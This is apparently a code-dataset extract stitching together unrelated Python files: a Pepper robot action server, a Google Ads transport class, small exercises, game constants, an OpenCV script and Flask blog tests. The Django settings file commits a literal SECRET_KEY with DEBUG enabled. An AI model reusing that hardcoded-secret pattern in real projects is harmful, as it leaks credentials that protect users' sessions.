    def __init__(self, actionName, session, robot):
        NAOqiAction_Base.__init__(self,actionName, session)
        self.robot = robot
    def actionThread_exec (self, params):
        # action init
        # action exec
        print "Action "+self.actionName+" "+params+" exec..."
        # ``params`` is the sentence the robot speaks.
        self.robot.say(params)
        # action end
        action_termination(self.actionName,params)
class WaitAction(NAOqiAction_Base):
    # PNP action that idles for ``params`` seconds (polled in 0.25 s steps so
    # the action can be interrupted via ``self.do_run``).
    def actionThread_exec (self, params):
        # action init
        dt = 0.25
        tmax = float(params)
        t = 0
        # action exec
        while (self.do_run and t<tmax):
            print "Action "+self.actionName+" "+params+" exec..."
            time.sleep(dt)
            t += dt
        # action end
        action_termination(self.actionName,params)
def initActions():
    """Connect to the robot and register the 'say' and 'wait' actions.

    Returns the NAOqi application object so the caller can run its loop.
    """
    pepper_cmd.begin()
    app = pepper_cmd.robot.app # action_base.initApp()
    SayAction('say', app.session, pepper_cmd.robot)
    WaitAction('wait', app.session)
    return app
# Start action server
if __name__ == "__main__":
    print("Starting action server (CTRL+C to quit)")
    app = initActions()
    # Serve registered actions (presumably blocks until interrupted -- verify).
    app.run()
| [
"noreply@github.com"
] | noreply@github.com |
2e1ce2b1f525c0e9d47d6fbdb67c819a692334fb | 245b92f4140f30e26313bfb3b2e47ed1871a5b83 | /airflow/providers/google_vendor/googleads/v12/services/services/customer_feed_service/transports/base.py | 023d30df6c5c442ea4db3635f9ad24a98bee2a10 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | ephraimbuddy/airflow | 238d6170a0e4f76456f00423124a260527960710 | 3193857376bc2c8cd2eb133017be1e8cbcaa8405 | refs/heads/main | 2023-05-29T05:37:44.992278 | 2023-05-13T19:49:43 | 2023-05-13T19:49:43 | 245,751,695 | 2 | 1 | Apache-2.0 | 2021-05-20T08:10:14 | 2020-03-08T04:28:27 | null | UTF-8 | Python | false | false | 5,984 | py | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
from typing import Awaitable, Callable, Optional, Sequence, Union
import pkg_resources
import google.auth # type: ignore
import google.api_core # type: ignore
from google.api_core import exceptions as core_exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
from airflow.providers.google_vendor.googleads.v12.services.types import customer_feed_service
try:
    # Report the installed google-ads client version in the request user-agent.
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
        gapic_version=pkg_resources.get_distribution("google-ads",).version,
    )
except pkg_resources.DistributionNotFound:
    # Distribution metadata unavailable (e.g. vendored copy): omit the version.
    DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
# NOTE(review): vendored, auto-generated GAPIC transport base class; keep
# manual edits minimal so it can be regenerated/diffed against upstream.
class CustomerFeedServiceTransport(abc.ABC):
    """Abstract transport class for CustomerFeedService."""
    AUTH_SCOPES = ("https://www.googleapis.com/auth/adwords",)
    DEFAULT_HOST: str = "googleads.googleapis.com"
    def __init__(
        self,
        *,
        host: str = DEFAULT_HOST,
        credentials: ga_credentials.Credentials = None,
        credentials_file: Optional[str] = None,
        scopes: Optional[Sequence[str]] = None,
        quota_project_id: Optional[str] = None,
        client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
        always_use_jwt_access: Optional[bool] = False,
        **kwargs,
    ) -> None:
        """Instantiate the transport.
        Args:
            host (Optional[str]):
                 The hostname to connect to.
            credentials (Optional[google.auth.credentials.Credentials]): The
                authorization credentials to attach to requests. These
                credentials identify the application to the service; if none
                are specified, the client will attempt to ascertain the
                credentials from the environment.
            credentials_file (Optional[str]): A file with credentials that can
                be loaded with :func:`google.auth.load_credentials_from_file`.
                This argument is mutually exclusive with credentials.
            scopes (Optional[Sequence[str]]): A list of scopes.
            quota_project_id (Optional[str]): An optional project to use for billing
                and quota.
            client_info (google.api_core.gapic_v1.client_info.ClientInfo):
                The client info used to send a user-agent string along with
                API requests. If ``None``, then default info will be used.
                Generally, you only need to set this if you're developing
                your own client library.
            always_use_jwt_access (Optional[bool]): Whether self signed JWT should
                be used for service account credentials.
        """
        # Save the hostname. Default to port 443 (HTTPS) if none is specified.
        if ":" not in host:
            host += ":443"
        self._host = host
        scopes_kwargs = {"scopes": scopes, "default_scopes": self.AUTH_SCOPES}
        # Save the scopes.
        self._scopes = scopes
        # If no credentials are provided, then determine the appropriate
        # defaults.
        if credentials and credentials_file:
            raise core_exceptions.DuplicateCredentialArgs(
                "'credentials_file' and 'credentials' are mutually exclusive"
            )
        if credentials_file is not None:
            credentials, _ = google.auth.load_credentials_from_file(
                credentials_file,
                **scopes_kwargs,
                quota_project_id=quota_project_id,
            )
        elif credentials is None:
            credentials, _ = google.auth.default(
                **scopes_kwargs, quota_project_id=quota_project_id
            )
        # If the credentials are service account credentials, then always try to use self signed JWT.
        if (
            always_use_jwt_access
            and isinstance(credentials, service_account.Credentials)
            and hasattr(
                service_account.Credentials, "with_always_use_jwt_access"
            )
        ):
            credentials = credentials.with_always_use_jwt_access(True)
        # Save the credentials.
        self._credentials = credentials
    def _prep_wrapped_messages(self, client_info):
        # Precompute the wrapped methods.
        self._wrapped_methods = {
            self.mutate_customer_feeds: gapic_v1.method.wrap_method(
                self.mutate_customer_feeds,
                default_timeout=None,
                client_info=client_info,
            ),
        }
    def close(self):
        """Closes resources associated with the transport.
        .. warning::
             Only call this method if the transport is NOT shared
             with other clients - this may cause errors in other clients!
        """
        raise NotImplementedError()
    @property
    def mutate_customer_feeds(
        self,
    ) -> Callable[
        [customer_feed_service.MutateCustomerFeedsRequest],
        Union[
            customer_feed_service.MutateCustomerFeedsResponse,
            Awaitable[customer_feed_service.MutateCustomerFeedsResponse],
        ],
    ]:
        raise NotImplementedError()
| [
"noreply@github.com"
] | noreply@github.com |
n = int(input())  # length of s (read to keep the input format, not used below)
s = input()
k = int(input())
# Keep characters equal to the k-th (1-indexed) character; mask the rest
# with '*'.  (Removed the dead ``ans`` variable and the redundant
# ``else: continue`` branch of the original.)
pivot = s[k - 1]
print(''.join(c if c == pivot else '*' for c in s))
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
917d87c6ebe1847b901ddff9bf53cbe8ab9c343d | 2132d79e8ade83a89cd8388164cc43e61f8d82ff | /paperboy_django/paperboy/settings.py | 4b3cb8dfb73e6e5f351ac3b43e5d5d439a03ddf1 | [] | no_license | nipa04/BootCamp-Works | ca2721495a948134ed31b020216e5826a77b2597 | 5cae671d5208b7cc8c8f858a7c316c59f64230f0 | refs/heads/master | 2023-01-07T21:54:36.577506 | 2020-01-30T16:58:53 | 2020-01-30T16:58:53 | 232,620,796 | 0 | 0 | null | 2023-01-06T03:47:26 | 2020-01-08T17:33:55 | PLSQL | UTF-8 | Python | false | false | 3,110 | py | """
Django settings for paperboy project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to the repository; rotate it and load it
# from the environment before any production deployment.
SECRET_KEY = '$io*d6*%^09cc5x8m%v=!7^jiy_@gqv4po=tvi=)%hyu9apv#z'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'paperboy',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'paperboy.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'paperboy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
# Development database: SQLite file next to manage.py.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
| [
"nipa.farjana04@gmail.com"
] | nipa.farjana04@gmail.com |
h = int(input('Высота пирамидки: '))
# Print a centred pyramid: row i has (h - i - 1) leading spaces followed by
# (2*i + 1) X's.  The original appended the X block only when the inner index
# hit ``j == h``, which never fires for h == 1 (range(1) stops at 0), so a
# height-1 pyramid printed a blank line instead of a single 'X'.
picture = ''
for i in range(h):
    picture += ' ' * (h - i - 1) + 'X' * (2 * i + 1) + '\n'
print(picture, end='')
| [
"noreply@github.com"
] | noreply@github.com |
97f4756fd60a43bb9c96e3865783d92af5ff73ee | 8af00a9c3ab73a6302948bbf320ed301b45cee86 | /src/misc/game_constants.py | 1f5fe3313f4ccf7889262d3588033c4fb5dd018d | [] | no_license | Schiggebam/FightOfAIs3 | 63629592dec3b84ce9268fdb53980ff7500c2451 | baccece6130752b72eb1a026047f8b2519b45110 | refs/heads/master | 2022-06-09T07:59:14.422282 | 2020-05-08T08:00:02 | 2020-05-08T08:00:02 | 254,623,947 | 2 | 2 | null | 2020-05-08T08:00:04 | 2020-04-10T12:00:47 | Python | UTF-8 | Python | false | false | 11,751 | py | from __future__ import annotations
import inspect
import sys
######################
### Game Constants ###
######################
from dataclasses import dataclass
from enum import Enum
from typing import Tuple
import arcade
#####################
### Game Settings ###
#####################
# Camera pan speed (units per tick -- TODO confirm against the camera code).
CAMERA_SENSITIVITY = 250
# Z-ordering: total number of draw layers and the layer of each sprite group.
NUM_Z_LEVELS = 5
Z_MAP = 1
Z_AUX = 2
Z_FLYING = 4
Z_GAME_OBJ = 3
# If True, error() terminates the process instead of just logging (see error()).
ERRORS_ARE_FATAL = False
DEBUG = True
DETAILED_DEBUG_INFO = 1 # 0: no info, 1: includes calling class, 2: includes calling method
ENABLE_KEYFRAME_ANIMATIONS = False
MAP_HACK_ENABLE_AT_STARTUP = False
# Interval between game-logic ticks (seconds, presumably -- verify).
GAME_LOGIC_CLK_SPEED = 0.75
VERSION: str = str(0.3)
UI_TEXTURE_PATH = "../resources/other/"
SHOW_AI_CTRL = True
SHOW_STARTUP_CTRL = True
SHOW_STATS_ON_EXIT = True
DEBUG_MODE = True
ALLOW_CONSOLE_CMDS = True
class bcolors:
    """ANSI terminal escape sequences for coloured console output."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # reset to the terminal's default style
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
########################
### Helper functions ###
########################
def get_caller() -> str:
    """Describe the class (and optionally method) two stack frames up.

    Must be invoked from inside another helper (debug/hint/error) so that
    frame 2 is the frame of interest.  Assumes that frame belongs to a bound
    method: it reads ``self`` from its locals and raises KeyError otherwise
    (error() catches that case explicitly).
    """
    stack = inspect.stack()
    the_class = stack[2][0].f_locals["self"].__class__.__name__
    the_method = stack[2][0].f_code.co_name
    if DETAILED_DEBUG_INFO == 2:
        return "(Class: {} Function: {})".format(the_class, the_method)
    elif DETAILED_DEBUG_INFO == 1:
        return "(Class: {})".format(the_class)
    # Previously fell off the end and implicitly returned None for any other
    # setting; return an empty string so callers can always concatenate.
    return ""
def debug(msg: str, colour=0):
    """Print *msg* when debug mode is enabled.

    :param msg: text to print.
    :param colour: kept for backward compatibility; the coloured/caller-tagged
        output path was disabled (it was commented out), so the value is
        currently ignored.
    """
    if not Definitions.DEBUG_MODE:
        return
    print(msg)
def hint(msg: str):
    """Print a yellow ``[HINT]`` message, tagged with the caller if enabled."""
    caller = ""
    if DETAILED_DEBUG_INFO:
        caller = get_caller()
    print("[HINT]{} : {}{}{}".format(caller, bcolors.WARNING, str(msg), bcolors.ENDC))
def error(msg: str):
    """Print a red error message; terminate the process if ERRORS_ARE_FATAL."""
    caller = ""
    if DETAILED_DEBUG_INFO:
        try:
            caller = get_caller()
        except KeyError:
            # get_caller() reads ``self`` from the caller's frame; plain
            # functions (no ``self``) raise KeyError.
            print("unable to get caller object - possible if it is called from 'self'")
    if ERRORS_ARE_FATAL:
        print("[FATAL]{} : {}{}{}".format(caller, bcolors.FAIL, str(msg), bcolors.ENDC))
        sys.exit(-1)
    else:
        print("[ERROR]{} : {}{}{}".format(caller, bcolors.FAIL, str(msg), bcolors.ENDC))
def start_progress(title):
    """Print the opening of a 10-segment ASCII progress bar.

    chr(8) (backspace) moves the cursor back inside the bar so progress()
    can overwrite the dashes with '#'.
    """
    global progress_x
    sys.stdout.write(title + ": [" + "-" * 10 + "]" + chr(8) * 11)
    sys.stdout.flush()
    progress_x = 0
def progress(x):
    """Advance the bar to *x* percent (0-100); call after start_progress()."""
    global progress_x
    x = int(x * 10 // 100)
    sys.stdout.write("#" * (x - progress_x))
    sys.stdout.flush()
    progress_x = x
progress_x = x
def end_progress():
sys.stdout.write("#" * (10 - progress_x) + "]\n")
sys.stdout.flush()
#####################
### TYPES ###########
#####################
class Priority(Enum):
    """Urgency levels, ordered from P_NO (0) up to P_CRITICAL (4)."""
    P_NO = 0
    P_LOW = 1
    P_MEDIUM = 2
    P_HIGH = 3
    P_CRITICAL = 4

    @staticmethod
    def increase(p: Priority):
        # Step one level up the ladder; P_CRITICAL saturates.
        return Priority(min(p.value + 1, Priority.P_CRITICAL.value))

    @staticmethod
    def decrease(p: Priority):
        # Step one level down the ladder; P_NO saturates.
        return Priority(max(p.value - 1, Priority.P_NO.value))
class PlayerType(Enum):
    """Who controls a player slot."""
    AI = 0
    BARBARIC = 1
    VILLAGER = 2
    HUMAN = 3

    @staticmethod
    def get_type_from_strcode(str_code: str) -> PlayerType:
        """Translate a scenario-file string code into a PlayerType."""
        by_code = {
            "barbaric": PlayerType.BARBARIC,
            "villager": PlayerType.VILLAGER,
            "human": PlayerType.HUMAN,
        }
        # Anything unrecognised is treated as a scripted AI player.
        return by_code.get(str_code, PlayerType.AI)
# logs
class LogType(Enum):
    """Categories for entries in the in-game log/notification feed."""
    BATTLE_ARMY_VS_ARMY = 900
    BATTLE_ARMY_VS_BUILDING = 901
    DIPLO_ENEMY_BUILDING_SCOUTED = 902
    NOTIFICATION = 903
# ground
class GroundType(Enum):
    """Terrain category of a map tile."""
    GRASS = 0
    WATER_DEEP = 1
    STONE = 2
    OTHER = 3
    # Workaround for mixed tiles which are walkable and buildable
    # (they have no associated str_code).
    MIXED = 4

    @staticmethod
    def get_type_from_strcode(str_code: str) -> GroundType:
        """Translate a map-file tile code into a GroundType."""
        by_code = {
            "gr": GroundType.GRASS,
            "gc": GroundType.GRASS,   # both grass variants map to GRASS
            "st": GroundType.STONE,
            "wd": GroundType.WATER_DEEP,
        }
        return by_code.get(str_code, GroundType.OTHER)
# buildings
class BuildingType(Enum):
    """Concrete building kinds placeable on the map."""
    HUT = 20
    FARM = 21
    CAMP_1 = 22
    CAMP_2 = 23
    CAMP_3 = 24
    VILLA = 25
    VILLAGE_1 = 26
    VILLAGE_2 = 27
    VILLAGE_3 = 28
    BARRACKS = 29
    OTHER_BUILDING = 30

    @staticmethod
    def get_type_from_strcode(str_code: str) -> BuildingType:
        """Translate a map-file building code into a BuildingType."""
        by_code = {
            "s1": BuildingType.HUT,
            "s2": BuildingType.VILLA,
            "fa": BuildingType.FARM,
            "c1": BuildingType.CAMP_1,
            "c2": BuildingType.CAMP_2,
            "c3": BuildingType.CAMP_3,
            "vl1": BuildingType.VILLAGE_1,
            "vl2": BuildingType.VILLAGE_2,
            "vl3": BuildingType.VILLAGE_3,
            "br": BuildingType.BARRACKS,
        }
        return by_code.get(str_code, BuildingType.OTHER_BUILDING)
class ResourceType(Enum):
    """Harvestable resource kinds found on map tiles."""
    ROCK = 10
    GOLD = 11
    FOREST = 12
    OTHER_RESOURCE = 19

    @staticmethod
    def get_type_from_strcode(str_code: str) -> ResourceType:
        """Translate a map-file resource code into a ResourceType."""
        by_code = {
            "r1": ResourceType.ROCK,
            "g1": ResourceType.GOLD,
            "f1": ResourceType.FOREST,
        }
        return by_code.get(str_code, ResourceType.OTHER_RESOURCE)
class DiploEventType(Enum):
    """Events that feed the diplomacy system."""
    TYPE_ENEMY_ARMY_INVADING = 100
    TYPE_ENEMY_BUILDING_SCOUTED = 101
    ENEMY_BUILDING_IN_CLAIMED_ZONE = 102
    ENEMY_ARMY_INVADING_CLAIMED_ZONE = 103
    ATTACKED_BY_FACTION = 104
    PROTECTIVE_ARMY_SPOTTED = 105
    # ---- TRADE EVENTS ---
    RECEIVED_GIFT = 116
    RECEIVED_CLAIM = 117
    DONE_DEAL = 118

    @staticmethod
    def get_event_description(event: DiploEventType, loc: Tuple[int, int]):
        """Human-readable text for *event*; *loc* is appended where relevant."""
        located = {
            DiploEventType.TYPE_ENEMY_BUILDING_SCOUTED: "Enemy building scouted at: ",
            DiploEventType.TYPE_ENEMY_ARMY_INVADING: "Enemy army scouted at: ",
        }
        if event in located:
            return located[event] + str(loc)
        fixed = {
            DiploEventType.ENEMY_BUILDING_IN_CLAIMED_ZONE: "Enemy building is located in claimed zone",
            DiploEventType.ENEMY_ARMY_INVADING_CLAIMED_ZONE: "Enemy army is invading claimed zone",
            DiploEventType.ATTACKED_BY_FACTION: "Attacked by Faction",
            DiploEventType.PROTECTIVE_ARMY_SPOTTED: "Protection by army",
        }
        # Everything else (e.g. the trade events) falls back to the member name.
        return fixed.get(event, event.name)
class UnitType(Enum):
    """Recruitable unit kinds."""
    KNIGHT = 0
    MERCENARY = 1
    BABARIC_SOLDIER = 2

    @staticmethod
    def get_type_from_strcode(str_code: str):
        """Translate a unit string code into a UnitType."""
        by_code = {
            "unit_a": UnitType.MERCENARY,
            "unit_b": UnitType.KNIGHT,
            "unit_c": UnitType.BABARIC_SOLDIER,
        }
        # Unknown codes yield -1 (not an enum member) -- callers compare
        # against that sentinel, so it must be preserved.
        return by_code.get(str_code, -1)
class TradeType(Enum):
    # NOTE(review): each bare string below documents the member that FOLLOWS
    # it; the first one therefore also serves as the class docstring.
    """in a gift, specify only the offer of the trade. Nothing is given in return"""
    GIFT = 220
    """normal offer, where both demand and offer are specified"""
    OFFER = 221
    """only the demand is specified.
    make sure to set the target_id field in AI_Trade if a specific player is targeted"""
    CLAIM = 222
class TradeCategory(Enum):
    """What kind of good a trade deals in."""
    RESOURCE = 210
    CULTURE = 211
    FOOD = 212
class PlayerColour(Enum):
    """Player banner colours, plus conversions to str codes / arcade colours."""
    YELLOW = 60
    TEAL = 61
    RED = 62
    BLUE = 63
    GREEN = 64
    PINK = 65
    NO_COLOUR = 69
    @staticmethod
    def get_type_from_strcode(str_code: str) -> PlayerColour:
        """Translate a colour string code into a PlayerColour (inverse of get_colour_code)."""
        if str_code == "yellow":
            return PlayerColour.YELLOW
        elif str_code == "red":
            return PlayerColour.RED
        elif str_code == "teal":
            return PlayerColour.TEAL
        elif str_code == "pink":
            return PlayerColour.PINK
        elif str_code == "green":
            return PlayerColour.GREEN
        elif str_code == "blue":
            return PlayerColour.BLUE
        return PlayerColour.NO_COLOUR
    @staticmethod
    def player_colour_to_arcade_colour(colour: PlayerColour) -> arcade.Color:
        """Map a PlayerColour to the arcade library colour used for rendering.

        NOTE(review): NO_COLOUR has no branch here, so it implicitly returns
        None despite the declared return type -- confirm callers tolerate it.
        """
        if colour == PlayerColour.YELLOW:
            return arcade.color.YELLOW
        elif colour == PlayerColour.TEAL:
            return arcade.color.PALE_BLUE
        elif colour == PlayerColour.RED:
            return arcade.color.RED
        elif colour == PlayerColour.PINK:
            return arcade.color.PINK
        elif colour == PlayerColour.BLUE:
            return arcade.color.BLUE
        elif colour == PlayerColour.GREEN:
            return arcade.color.GREEN
    @staticmethod
    def get_colour_code(colour: PlayerColour) -> str:
        """Translate a PlayerColour into its string code (inverse of get_type_from_strcode)."""
        if colour == PlayerColour.YELLOW:
            return 'yellow'
        elif colour == PlayerColour.TEAL:
            return 'teal'
        elif colour == PlayerColour.RED:
            return 'red'
        elif colour == PlayerColour.PINK:
            return 'pink'
        elif colour == PlayerColour.BLUE:
            return 'blue'
        elif colour == PlayerColour.GREEN:
            return 'green'
        return 'no_colour'
class MoveType(Enum):
    # Each bare string below documents the AI move that follows it.
    """ does not require any additional fields to be set"""
    DO_NOTHING = 230
    """requires the 'loc' field to be set, indicating the location of the hexagon to be scouted"""
    DO_SCOUT = 231
    """requires the 'loc' field to be set, indicating the location of the building to be upgraded"""
    DO_UPGRADE_BUILDING = 232
    """requires the 'loc' field to be set, indicating the location of the building site
    also, requires the 'type' field to specify the Type of the building"""
    DO_BUILD = 233
    """requires the 'type' field to be set, indicating the UnitType"""
    DO_RECRUIT_UNIT = 234
    """requires the 'loc' field to be set, indicating the hexagon where the new army should appear"""
    DO_RAISE_ARMY = 235
class BattleAfterMath(Enum):
    """Outcome of a resolved battle."""
    ATTACKER_WON = 0
    DEFENDER_WON = 1
    DRAW = 2
###################
### Dataclasses ###
###################
@dataclass
class UnitCost:
    """Price of recruiting one unit, in resources, culture and population slots."""
    resources: int
    culture: int
    population: int
###############
### STATES ####
###############
# class GameLogicState(Enum):
# READY_TO_PLAY_TURN = 50
# WAIT_FOR_HI = 51
class BuildingState(Enum):
    """Lifecycle of a building on the map."""
    UNDER_CONSTRUCTION = 30
    ACTIVE = 31
    DESTROYED = 32
class TradeState(Enum):
    # Each bare string below documents the member that follows it; the first
    # one also serves as the class docstring.
    """The AI can choose to accept a trade by setting the state from OPEN to ACCEPTED"""
    ACCEPTED = 0
    """default state of a trade"""
    OPEN = 1
    """if the AI chooses to open a new state, set it to new"""
    NEW = 2
    """Currently, only supported in relation with claims"""
    REFUSED = 3
class GameLogicState(Enum):
    """Turn-machine states of the game logic."""
    NOT_READY = 0
    # NOTE(review): value 1 is intentionally unused? -- verify against the
    # commented-out legacy enum above.
    READY_FOR_TURN = 2
    WAITING_FOR_AGENT = 3
    TURN_COMPLETE = 4
class CursorState(Enum):
    """Mouse-cursor mode (normal pointer vs. combat targeting)."""
    NORMAL = 320
    COMBAT = 321
| [
"Vert*Jun1"
] | Vert*Jun1 |
98cf21e77fc8ef4b79de89b802717217d9af6177 | b2c59fca7af5367764238027cccbef24b262440f | /resize-get_coordinate.py | f0cf811c5de188ffd2ad88dd2cba63cdc72e835d | [] | no_license | oc-tobot/test2 | 7e767229bac9b5980b47fbd1aeb4dd2c37857735 | 93dc9e9fd41ae83d95561297d10493039c95e68e | refs/heads/main | 2023-01-20T19:37:27.999582 | 2020-11-30T15:18:44 | 2020-11-30T15:18:44 | 317,262,073 | 0 | 0 | null | 2020-11-30T15:18:45 | 2020-11-30T15:15:10 | null | UTF-8 | Python | false | false | 1,514 | py | import cv2
#get coordinate of the place where mouse click
def get_coor(event, x, y, flags, param):
    """Mouse callback: on left click, draw the click coordinates onto ``img``.

    Relies on the module-level ``img`` loaded at the bottom of the script.
    """
    if event == cv2.EVENT_LBUTTONDOWN:
        # Do Whatever you want to, when the event occurs
        ix,iy = x,y
        font = cv2.FONT_HERSHEY_SIMPLEX
        cv2.putText(img, str(ix),(x-100,y),font,1,(255,0,0),4)
        cv2.putText(img, str(iy),(x-100,y+30),font,1,(255,0,0),4)
'''cut image on mouse click (like drawing a rectangle) : go to click_and_crop for the right click and crop fucntionality'''
# Selection state shared with the callback below: two corner clicks define
# ``rect`` as (x1, y1, x2, y2); a third click resets the selection.
point1 = False
point2 = False
rect = (0,0,0,0)
def cut_image(event, x, y, flags, params):
    """Mouse callback collecting two corner points of a crop rectangle."""
    global rect, point1, point2
    if event == cv2.EVENT_LBUTTONDOWN:
        if point1 == True and point2 == True:
            # Third click: discard the finished rectangle, start over.
            point1 = False
            point2 = False
            rect = (0,0,0,0)
        elif point1 == False:
            rect = (x,y,0,0,)
            point1 = True
        elif point2 == False:
            rect = (rect[0],rect[1], x, y)
            point2 = True
    return rect  # NOTE(review): OpenCV ignores callback return values
#resize an image : this is the right one
def resize(new_x,new_y,img):
    """Resize ``img`` to (new_x, new_y) pixels, storing it in global ``new_img``.

    The global is kept (rather than only returning) because the script below
    reads ``new_img`` directly after calling this function.
    """
    global new_img
    new_img = cv2.resize(img, (new_x,new_y))
    return new_img
img = cv2.imread('6pack_cat.jpg')
img2 = cv2.imread('6pack_cut.jpg')
# Shrink the cut-out to 240x240 (also sets the global ``new_img``) and save it.
resize(240,240,img2)
cv2.imwrite('6pack_cut_resized.jpg', new_img)
# Display all three images until ESC is pressed.
while True:
    cv2.imshow('1',img)
    cv2.imshow('2',img2)
    cv2.imshow('3', new_img)
    k = cv2.waitKey(1)
    if k == 27:  # ESC
        break
cv2.destroyAllWindows()
"noreply@github.com"
] | noreply@github.com |
a2895c375cdca0634a6d85a52cc1838a3c58292c | 092f2dd962c9c393904fd9886a726c611f8aa811 | /palletsprojects_tutorial/tests/test_blog.py | dc6550b7ef96d8db0bc0fc4e69758814b26112df | [] | no_license | iAnafem/flask_tutorial_projects | b5d2b4f7e2eb68ed54de3938d9006889c9fe76fb | c0f77fe4056b8f7c4ab16bb9cbc75f4fe90d4bde | refs/heads/master | 2022-12-13T07:13:56.415457 | 2019-08-28T20:14:35 | 2019-08-28T20:16:11 | 200,421,166 | 0 | 0 | null | 2022-12-08T06:00:55 | 2019-08-03T21:09:25 | Python | UTF-8 | Python | false | false | 2,609 | py | import pytest
from flaskr.db import get_db
def test_index(client, auth):
response = client.get('/')
assert b'Log In' in response.data
assert b'Register' in response.data
auth.login()
response = client.get('/')
assert b'Log Out' in response.data
assert b'test title' in response.data
assert b'by test on 2018-01-01' in response.data
assert b'test\nbody' in response.data
assert b'href="/1/update"' in response.data
@pytest.mark.parametrize('path', (
'/create',
'/1/update',
'/1/delete',
))
def test_login_required(client, path):
response = client.post(path)
assert response.headers['Location'] == 'http://localhost/auth/login'
def test_author_required(app, client, auth):
# change the post author to another user
with app.app_context():
db = get_db()
db.execute('UPDATE post SET author_id = 2 WHERE id = 1')
db.commit()
auth.login()
# current user can't modify other user's post
assert client.post('/1/update').status_code == 403
assert client.post('/1/delete').status_code == 403
# current user doesn't see edit link
assert b'href="/1/update"' not in client.get('/').data
@pytest.mark.parametrize('path', (
'/2/update',
'/2/delete',
))
def test_exists_required(client, auth, path):
auth.login()
assert client.post(path).status_code == 404
def test_create(client, auth, app):
auth.login()
assert client.get('/create').status_code == 200
client.post('create', data={'title': 'created', 'body': ''})
with app.app_context():
db = get_db()
count = db.execute('SELECT COUNT(id) FROM post').fetchone()[0]
assert count == 2
def test_update(client, auth, app):
auth.login()
assert client.get('/1/update').status_code == 200
client.post('/1/update', data={'title': 'updated', 'body': ''})
with app.app_context():
db = get_db()
post = db.execute('SELECT * FROM post WHERE id = 1').fetchone()
assert post['title'] == 'updated'
@pytest.mark.parametrize('path', (
'/create',
'/1/update',
))
def text_create_update_validate(client, auth, path):
auth.login()
response = client.post(path, data={'title': '', 'body': ''})
assert b'Title is required.' in response.data
def test_delete(client, auth, app):
auth.login()
response = client.post('/1/delete')
assert response.headers['Location'] == 'http://localhost/'
with app.app_context():
db = get_db()
post = db.execute('SELECT * FROM post WHERE id = 1').fetchone()
assert post is None
| [
"DPronkin@mostro.ru"
] | DPronkin@mostro.ru |
